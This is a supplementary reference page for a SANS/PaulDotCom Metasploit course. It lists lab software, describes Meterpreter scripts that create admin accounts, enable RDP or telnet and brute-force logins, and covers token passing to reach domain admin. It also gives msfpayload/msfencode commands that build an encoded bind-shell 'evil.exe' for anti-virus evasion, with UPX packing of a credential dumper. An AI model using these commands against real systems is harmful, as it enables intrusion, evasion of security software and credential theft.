This page is presented without warranty or support. It is meant to provide supplementary materials as a reference for Metasploit and is not part of any official course material. Please direct all comments, questions, and suggestions to email@example.com.
The PaulDotCom Team
The SANS course uses the following software:
- Metasploit - You can download and install Metasploit 3.2 For Linux Here
- Icecast - You can install this software on Windows XP and then use Metasploit to exploit it. You will need Icecast Version 2.0.1 For Windows Here
- Firefox - For the browser_autopwn exercise you will need an older version of Firefox, Download Firefox Version 1.0.4 Here. This should also be installed on your Windows VM that you will be exploiting.
Setup Your Environment
Using the "setg" command you can set global datastores (variables). Once you've setup your RHOST, for example, you can issue the "save" command and metasploit will write your global datastores to a config file in your home directory in the ".msf" directory. Below is an example:
msf > setg Global ====== Name Value ---- ----- RHOST 192.168.169.30 msf > setg RHOST 192.168.169.40 RHOST => 192.168.169.40 msf > save Saved configuration to: /Users/paul/.msf3/config msf > setg Global ====== Name Value ---- ----- RHOST 192.168.169.40 msf >
References & Resources
PaulDotCom Technical Segments On Metasploit and Practical Usages
- "karmetasploit" technical Segment: PaulDotCom Episode 114 - Probably one of the most powerful features in Metasploit is its integration with Karma, a wireless attack that lets you become the access point for any probe SSID. Scripts allow you to do evil things to the client, such as steal cookies and Windows authentication credentials.
- db_autopwn Technical Segment: PaulDotCom Episode 124 - Showcasing db_autopwn's features, including Nmap & Nessus integration.
- WPAD Attacks and Metasploit: Technical Segment Episode 138 - Another way to "get in the middle" with Metasploit and showcase some of the cool things it can do.
Other Metasploit Related Resources
- http://www.oldapps.com - Find older versions of Software
- Null Byte in Shellcode problem - http://books.google.com/books?id=ZNI5dvBSfZoC&pg=RA1-PA341&lpg=RA1-PA341&dq=avoid+null+byte+in+shellcode&source=web&ots=YpBNIuucix&sig=NeqTImK-5qtznvt7Q1S2V5ELifc&hl=en&sa=X&oi=book_result&resnum=4&ct=result
- RevertToSelf system call - http://technet.microsoft.com/en-us/library/cc750021.aspx
- SEH Exploit Example - http://www.securityforest.com/wiki/index.php/Exploit:_Stack_Overflows_-_Exploiting_SEH_on_win32
- SEH "Whitepaper" - http://www.thc.org/download.php?t=p&f=Practical-SEH-exploitation.pdf
- Free Metasploit Online Book (Wikibook) - http://en.wikibooks.org/wiki/Metasploit/Contents
- Paul's Delicious Bookmarks With Tag "Metasploit" (They are yummy!)
Icecast Background Task
Custom Meterpreter Scripts
Go to http://darkoperator.blogspot.com/ and review the available downloads:
- gettelnet- This script will enable telnet service on the target machine if it is running Windows 2003 or higher, in the case of Windows Vista and Windows 2008 that do not have the service installed by default the script will install the service and configure it to start automatically, in addition a username and password can be provided so that a local account with administrative privelages can be created and placed in the apropiate groups.
- remotewinenun - This script will run wmic command enumerating diferent settings from a target computer using the credential of the process under withc meterpreter is running under, a username and password can also be provided.
- Winenum - general windows enumeration script for gathering all kinds of information from windows host adapting the commands and informatio gathered to the version of windows where is ran at.
- Netenum - network enumeration script for performing basic network enumeration of the target enviroment. It will perform ping sweeps, hostname bruteforce, reverse lokkups on ranges and general DNS record enumeration.
- Winbf - it will perform loging brute force attacks against winown logins using dictionaries against a single login or a list of usernames. It will also enumerate the current windows account lockout and lenght policy so the user will be able to better tailor the attack.
- Getgui - script for enabling RDP and for creating an account adding it to the appropiate groups to be able to get Remote Desktop on the target machine.
Now go to this directory "<metasploit dir>/scripts/meterpreter/" and download the scripts:
wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/getgui.rb wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/winbf.rb wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/netenum.rb wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/winenum.rb wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/remotewinenum.rb wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/gettelnet.rb
Check out cool posts from "Darkoperator":
Bonus: Find and run the custom script darkoperator wrote for PaulDotCom.
Winenum In Action
GetGui In Action
Token Passing With Incognito
I did not have a domain to test with, so this example is pretty silly. However, the bottom line here is that you can jump from a local admin account to a domain admin account in most cases. I think this is a pretty big security hole, Microsoft does not and dismisses it as "working by design". Below is an example:
- Another great tool for this is gsecdump
- Check out carnal0wnage blog post for more information. Even more interesting is the comments that link to another resource which *claims* to be able to copy the SAM database without Admin privs. It is somehow able to bypass the file restrictions/permissions by accessing the hard drive directly. We have not tested this.
Using Metasploit To Bypass Anti-Virus
After we gave the above tech segment, some corrections were posted by Mark Bagget:
So we end up with the following commands to create msf payloads that bypass anti-virus software:
bash-3.2# ./msfpayload windows/meterpreter/bind_tcp LPORt=4444 R | ./msfencode -t exe -o evil.exe [*] x86/shikata_ga_nai succeeded, final size 335 bash-3.2# md5 evil.exe MD5 (evil.exe) = a4c3438633637f37ab10cd16dc9de353 bash-3.2# ./msfpayload windows/meterpreter/bind_tcp LPORt=4444 R | ./msfencode -t exe -o evil.exe [*] x86/shikata_ga_nai succeeded, final size 335 bash-3.2# md5 evil.exe MD5 (evil.exe) = 25c08351d3bcdfa08da60509a17ee631
NOTE: Metasploit is not a packer, so it does not have a facility to take a binary payload and "pack" it. We've had great luck using UPX and PEScrambler for this purpose. Unfortunately, the PEScramber web site has been taken down. I do have a copy, and have been known to share :) For UPX, you can take any windows binary and do this (using gsecdump.exe as an example):
c:\> upx -2 -o gsecupx.exe gsecdump.exe